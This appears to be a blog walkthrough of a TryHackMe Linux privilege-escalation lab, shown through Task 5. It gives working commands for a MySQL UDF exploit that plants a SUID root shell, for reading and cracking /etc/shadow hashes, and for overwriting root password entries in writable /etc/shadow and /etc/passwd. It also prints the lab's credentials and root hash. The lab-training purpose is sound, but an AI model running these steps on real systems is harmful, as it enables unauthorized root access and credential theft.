Link to the room: https://tryhackme.com/room/linuxprivesc
Welcome, fellow learners, to the captivating realm of Linux Privilege Escalation! In this inaugural post, we set forth on an exhilarating expedition into the heart of a TryHackMe room named “Linux PrivEsc.” Here, we not only aim to unravel the secrets of obtaining root access but also aspire to share our progress and insights with aspiring enthusiasts like you.
Linux Privilege Escalation is an essential skill in the world of cybersecurity, enabling us to transcend the boundaries of user privileges and assume the coveted position of a system’s ultimate guardian – the root user. Through a series of intentionally misconfigured challenges on a Debian VM, we will delve into various methods, exploit vulnerabilities, and discover the elusive pathways that lead us closer to our goal.
Task 1: Deploy The Vulnerable Debian VM
Ready to get your machine up and running? We’ve got two simple options for you.
The first is using the in-browser AttackBox, which is convenient and straightforward.
Alternatively, you can connect to the TryHackMe VPN for the complete TryHackMe experience. To do this, just download your .ovpn config file from https://tryhackme.com/access and follow the instructions provided at https://tryhackme.com/room/openvpn. It’s as easy as that!
First things first, we’re going to use something called SSH, which stands for Secure Shell. It’s like a secret door that allows us to enter our misconfigured Debian VM (virtual machine) remotely. Think of it as sneaking into a locked room without being physically present!
To start, open up your terminal. Don’t worry, I’ll guide you through it step by step!
Now, in the terminal, you’re going to type something like this:
ssh user@MACHINE_IP
Disclaimer: don’t forget to replace <MACHINE_IP> with your own machine’s IP.
But what does all this mean?
“user” refers to the account we want to log in with, and “MACHINE_IP” is the address of the virtual machine we’re trying to access. It’s like a virtual address, kind of like your home address, but for computers!
Once you hit Enter after typing the command, you might see a message pop up that asks, “Are you sure you want to continue connecting (yes/no)?”
Don’t worry, it’s just the computer being a bit cautious. Just type in “yes” and press Enter again. We’re letting the computer know that we’re confident and ready to proceed!
Now, here comes the secret password part. The password for the “user” account is “password321”. Make sure to type it in carefully. And remember, keep it a secret, just between us!
Time for our first question, folks! Get ready to unleash the power of the “id” command and discover who we really are in the Linux world.
Picture this: You’re in your hacker mode, fingers dancing across the keyboard, and you type in the magical command “id” in your CLI. It’s like casting a spell to reveal your true identity in the Linux realm!
And boom! The CLI reveals your secret code name, along with some additional info. It’s like a secret agent dossier for hackers.
Question: Run the “id” command. What is the result?
Here’s the result to our question:
Answer: uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev)
That output is like a secret message that holds the key to our privileges and access levels. It tells us our user ID (uid), our group ID (gid), and the various groups we belong to. It’s like a secret society, where each group grants us certain powers and permissions.
Task 2: Service Exploits
Alright, buckle up, fellow hackers! We’ve got a juicy vulnerability in the MySQL service, and we’re about to exploit it like pros.
Step 1: Navigate to the Exploit Directory
Let’s get our tools ready. Change into the exploit directory by typing:
cd /home/user/tools/mysql-udf
Think of it as stepping into our secret hideout where all the hacking magic happens.
Step 2: Compile the Exploit
Now, it’s time to compile the exploit code and prepare it for action. Type in the following commands one by one:
gcc -g -c raptor_udf2.c -fPIC
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
It’s like forging our weapon, turning lines of code into a powerful tool.
Step 3: Connect to MySQL as Root
Let’s sneak into the MySQL service as the root user. Run this command:
mysql -u root
We’re in! But wait, the root user doesn’t have a password. Lucky us!
Step 4: Execute the Exploit
Time to execute our crafted exploit and create some havoc. Enter the following commands in the MySQL shell, one after the other:
use mysql;
create table foo(line blob);
insert into foo values(load_file('/home/user/tools/mysql-udf/raptor_udf2.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin
Now it’s time to wield your power in the MySQL shell! Execute the following commands within the MySQL shell to create a User Defined Function (UDF) called “do_system” using our exploit:
use mysql;
create table foo(line blob);
insert into foo values(load_file('/home/user/tools/mysql-udf/raptor_udf2.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
Imagine you’re crafting a special tool, carefully constructing the “do_system” function with the ability to execute commands.
Next, let’s put our creation to work. Use the function to copy “/bin/bash” to “/tmp/rootbash” and set the SUID permission:
select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');
It’s like activating a secret command to duplicate “/bin/bash” and give it special privileges in the “/tmp” directory.
Once you’ve completed these steps, it’s time to gracefully exit the MySQL shell. Simply type “exit” or “\q” and press Enter.
Now, imagine this: You’ve gained superpowers! Run the “/tmp/rootbash” executable with the “-p” flag to launch a shell running with root privileges:
/tmp/rootbash -p
You’ve unlocked the door to a whole new level of access, like stepping into a room reserved only for the chosen ones.
Remember, before moving forward, it’s crucial to tidy up. Remove the “/tmp/rootbash” executable to maintain a clean environment:
rm /tmp/rootbash
And finally, exit out of the root shell gracefully by typing “exit”.
Task 3: Weak File Permissions – Readable /etc/shadow
Question: What is the root user’s password hash?
To find the root user’s password hash, we start by looking at a file called ‘/etc/shadow’. Think of it as a vault that holds password-related information for all the users on a computer.
Inside the ‘/etc/shadow’ file, we search for the entry corresponding to the root user. Each line in the file represents a user, and between the first and second colons (:) on the root user’s line, we find the password hash.
We can look into the /etc/shadow file by entering the following command:
cat /etc/shadow
In this case, we discovered that the root user’s password hash is ‘$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0‘. This hash is created using a secure algorithm called SHA-512.
Answer: $6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0
Question: What hashing algorithm was used to produce the root user’s password hash?
Answer: sha512crypt
Now that we have the root user’s password hash, let’s proceed with the thrilling task of cracking it using the mighty John the Ripper.
Get ready for the next steps:
- To begin the cracking process, we need to save the root user’s password hash into a file called ‘hash.txt’. It’s like capturing the secret code we want to unravel.
- Here’s a crucial point: Depending on the specific version of Kali Linux you’re using, it might be necessary to run the command with administrative privileges. This ensures that we have the necessary permissions and access to the required resources.
So, the command you’ll run is:
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
With this command, we set John the Ripper on the chase, eagerly hunting for the password that matches the given hash. The adventure unfolds as it tries different combinations and possibilities.
Question: What is the root user’s password?
Answer: password123
Task 4: Weak File Permissions – Writable /etc/shadow
Normally, the “/etc/shadow” file, which contains user password hashes, is accessible only to the mighty root user. But here’s a twist: on our VM, the “/etc/shadow” file is world-writable.
Now, we’ll create a brand new password hash with a password of our choice. Let’s say our chosen password is “newpasswordhere”. We’ll generate the hash using the command “mkpasswd -m sha-512 newpasswordhere“.
Here comes the thrilling part: we’ll edit the “/etc/shadow” file and replace the original root user’s password hash with the new one we just generated.
To begin, we need to open the “/etc/shadow” file using a text editor. We can use a command-line text editor like “nano” or “vi” for this purpose. For example, we can use the command: sudo nano /etc/shadow
Once the file is open, locate the line that corresponds to the root user. Each line represents a user, and the root user’s line begins with the username “root”. Look for the password hash, which is typically between the first and second colons (:) on that line.
Carefully replace the original password hash with the newly generated password hash you obtained using the “mkpasswd” command.
After making the necessary change, save the modifications and exit the text editor. In “nano”, you can press “Ctrl + O” to save the file, followed by “Enter”, and then “Ctrl + X” to exit.
Now, let’s harness the power of the new password we set for the root user and switch to that account by entering the following command: su root
After entering the command, you’ll be prompted to provide the password for the root user—the new password we generated and set in the “/etc/shadow” file. Type in the new password.
Task 5: Weak File Permissions – Writable /etc/passwd
Great progress so far! Now, let’s continue our adventure with the “/etc/passwd” file and perform some exciting tasks.
Here’s what we’ll do next:
As a reminder, the “/etc/passwd” file contains vital information about user accounts. It’s accessible by anyone and usually only writable by the root user. Think of it as a ledger that holds crucial details about the users on our system.
In our exploration, we discovered that the “/etc/passwd” file has unique permissions. To confirm these permissions, we used the command “ls -l /etc/passwd“. It’s like peering into a locked chest to check who can access and make changes to it.
Now, let’s generate a new password hash with a password of our choice. We used the “openssl passwd” command to create this hash.
We’ll open the “/etc/passwd” file using a text editor and make some crucial edits. We have two options to choose from:
Now, with our modifications in place, we’ll switch to the root account using the new password we set.
Option 1: We’ll place the newly generated password hash between the first and second colon (:) of the root user’s row, replacing the existing “x”.
Option 2: Alternatively, we can create a brand new user named “newroot” by copying the entire row for the root user and modifying it accordingly. We’ll change the first occurrence of the word “root” to “newroot”. As we do this, we’ll insert the newly generated password hash between the first and second colon.
Now, with our modifications in place, it’s time to embrace the power of the root user. We’ll switch to the root account using the new password we set.
Question: Run the “id” command as the newroot user. What is the result?
Answer: uid=0(root) gid=0(root) groups=0(root)
Task 6: Sudo – Shell Escape Sequences